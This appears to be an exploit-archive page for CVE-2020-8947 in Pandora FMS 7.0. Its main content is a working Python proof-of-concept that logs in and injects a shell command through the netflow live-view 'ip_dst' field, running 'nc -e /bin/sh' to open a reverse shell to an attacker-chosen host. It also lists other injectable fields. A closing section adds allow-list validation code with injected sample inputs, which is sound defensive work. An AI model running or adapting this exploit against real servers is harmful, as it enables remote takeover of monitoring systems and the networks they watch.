| Title | Published | Views | Reporter |
|---|---|---|---|
| PANDORAFMS 7.0 - Authenticated Remote Code Execution Exploit | 13 Feb 2020 00:00 | – | zdt |
| Artica Pandora FMS Remote Code Execution Vulnerability | 17 Feb 2020 00:00 | – | cnvd |
| CVE-2020-8947 | 12 Feb 2020 17:52 | – | cve |
| CVE-2020-8947 | 12 Feb 2020 17:52 | – | cvelist |
| PANDORAFMS 7.0 - Authenticated Remote Code Execution | 13 Feb 2020 00:00 | – | exploitpack |
| CVE-2020-8947 | 12 Feb 2020 18:15 | – | nvd |
| Pandora FMS 7.0 Authenticated Remote Code Execution | 13 Feb 2020 00:00 | – | packetstorm |
| Design/Logic Flaw | 12 Feb 2020 18:15 | – | prion |
| CVE-2020-8947 | 22 May 2025 17:11 | – | redhatcve |

```python
# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution
# Date: 2020-02-12
# Exploit Author: Engin Demirbilek
# Vendor homepage: http://pandorafms.org/
# Version: 7.0
# Software link: https://pandorafms.org/features/free-download-monitoring-software/
# Tested on: CentOS
# CVE: CVE-2020-8947
#!/bin/python
'''
PANDORAFMS 7.0 Authenticated Remote Code Execution x4
This exploit can be edited to exploit the 4 authenticated RCE vulnerabilities that exist in PANDORAFMS.
In case the default vulnerable variable doesn't work, change the position of the payload to one of the following: ip_src, dst_port, src_port
Author: Engin Demirbilek
Github: github.com/EnginDemirbilek
CVE: CVE-2020-8947
'''
import requests
import sys

if len(sys.argv) < 6:
    print "Usage: ./exploit.py http://url username password listenerIP listenerPort"
    exit()

url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
payload = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' ' + '#'

login = {
    'nick':user,
    'pass':password,
    'login_button':'Login'
}
req = requests.Session()
print "Sendin login request ..."
login = req.post(url+"/pandora_console/index.php?login=1", data=login)

payload = {
    'date':"",
    'time':"",
    'period':"",
    'interval_length':"",
    'chart_type':"",
    'max_aggregates':"1",
    'address_resolution':"0",
    'name':"",
    'assign_group':"0",
    'filter_type':"0",
    'filter_id':"0",
    'filter_selected':"0",
    'ip_dst':payload,
    'ip_src':"",
    'dst_port':"",
    'src_port':"",
    'advanced_filter':"",
    'aggregate':"dstip",
    'router_ip':"",
    'output':"bytes",
    'draw_button':"Draw"
}

print "[+] Sendin exploit ..."

exploit = req.post(url+"/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",cookies=req.cookies, data=payload, headers={
    'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Encoding':'gzip, deflate',
    'Content-Type':'application/x-www-form-urlencoded'})

if exploit.status_code == 200:
    print "[+] Everything seems ok, check your listener. If no connection established, change position of payload to ip_src, dst_port or src_port."
else:
    print "[-] Couldn't send the HTTP request, try again."
```
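The four fields the PoC names (`ip_dst`, `ip_src`, `dst_port`, `src_port`) should only ever hold IP addresses and port numbers, so an allow-list check on them rejects any value of the shape used above. The following is an added example, not code from the original page or from Pandora FMS and not the vendor's fix; the function names and the comma-separated list syntax are assumptions.

```python
import ipaddress

# The four nf_live_view POST fields the PoC's docstring names as injectable.
IP_FIELDS = ("ip_dst", "ip_src")
PORT_FIELDS = ("dst_port", "src_port")


def _is_ip(item):
    # Python 3.9+ accepts an IPv6 scope id ("::1%<anything>"), and the text
    # after '%' is not restricted to safe characters, so refuse '%' outright.
    if "%" in item:
        return False
    try:
        ipaddress.ip_address(item)
        return True
    except ValueError:
        return False


def _is_port(item):
    # isascii() excludes Unicode digits that isdigit() alone would accept.
    return item.isascii() and item.isdigit() and len(item) <= 5 and int(item) <= 65535


def rejected_fields(form):
    """Return {field: first offending item} for fields that fail their allow-list."""
    bad = {}
    for fields, check in ((IP_FIELDS, _is_ip), (PORT_FIELDS, _is_port)):
        for name in fields:
            value = form.get(name, "")
            if value == "":  # empty means "no filter", as in the PoC's form
                continue
            # Assumption: a field may carry a comma-separated list of values.
            for item in (part.strip() for part in value.split(",")):
                if not check(item):
                    bad[name] = item
                    break
    return bad


# Constructed sample form data (not captured traffic).
BENIGN = {"ip_dst": "192.0.2.10, 2001:db8::1", "ip_src": "", "dst_port": "443,8443", "src_port": ""}
# Same shape as the PoC value: closing quote, ';', a command, trailing '#'.
INJECTED = {"ip_dst": '";echo test #', "ip_src": "::1%;echo test", "dst_port": "80", "src_port": "99999"}

if __name__ == "__main__":
    print(rejected_fields(BENIGN))
    print(rejected_fields(INJECTED))
```

A request with a non-empty result should be refused before any of its values reach a command line, and logged, since an authenticated user submitting shell metacharacters in a netflow filter is worth an alert.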